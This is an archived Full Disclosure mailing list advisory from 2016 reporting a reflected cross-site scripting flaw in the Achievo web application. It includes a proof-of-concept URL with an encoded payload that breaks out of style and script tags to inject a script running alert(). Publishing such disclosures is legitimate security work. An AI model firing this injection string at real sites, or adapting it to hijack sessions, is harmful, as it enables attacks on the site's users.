[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] Achievo Cross Site Scripting vulnerability
From:       SECUPENT Research Center <research () secupent ! com>
Date:       2016-03-20 14:48:01
Message-ID: 153947f420b.eab80f6e108966.2903848363876291279 () secupent ! com
[Download RAW message or body]

Exploit Title: Achievo Cross Site Scripting vulnerability
Vendor: www.achievo.org
Software Link: http://www.opensourcecms.com/scripts/details.php?scriptid=98
Author: SECUPENT 
Website:www.secupent.com
Email: research{at}secupent{dot}com
Date: 20-3-2016




Cross Site scripting link: \
http://site/achievo/index.php?%27%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%3Ealert%280x000912%29%3C%2fscRipt%3E
                
Screenshot: http://secupent.com/exploit/images/achievoxss.jpg


["achievo.txt" (text/plain)]

Exploit Title: Achievo Cross Site Scripting vulnerability
Vendor: www.achievo.org
Software Link: http://www.opensourcecms.com/scripts/details.php?scriptid=98
Author: SECUPENT 
Website:www.secupent.com
Email: research{at}secupent{dot}com
Date: 20-3-2016


 Cross Site scripting link: \
http://site/achievo/index.php?%27%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%3Ealert%280x000912%29%3C%2fscRipt%3E
  Screenshot: http://secupent.com/exploit/images/achievoxss.jpg


 
 
 



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic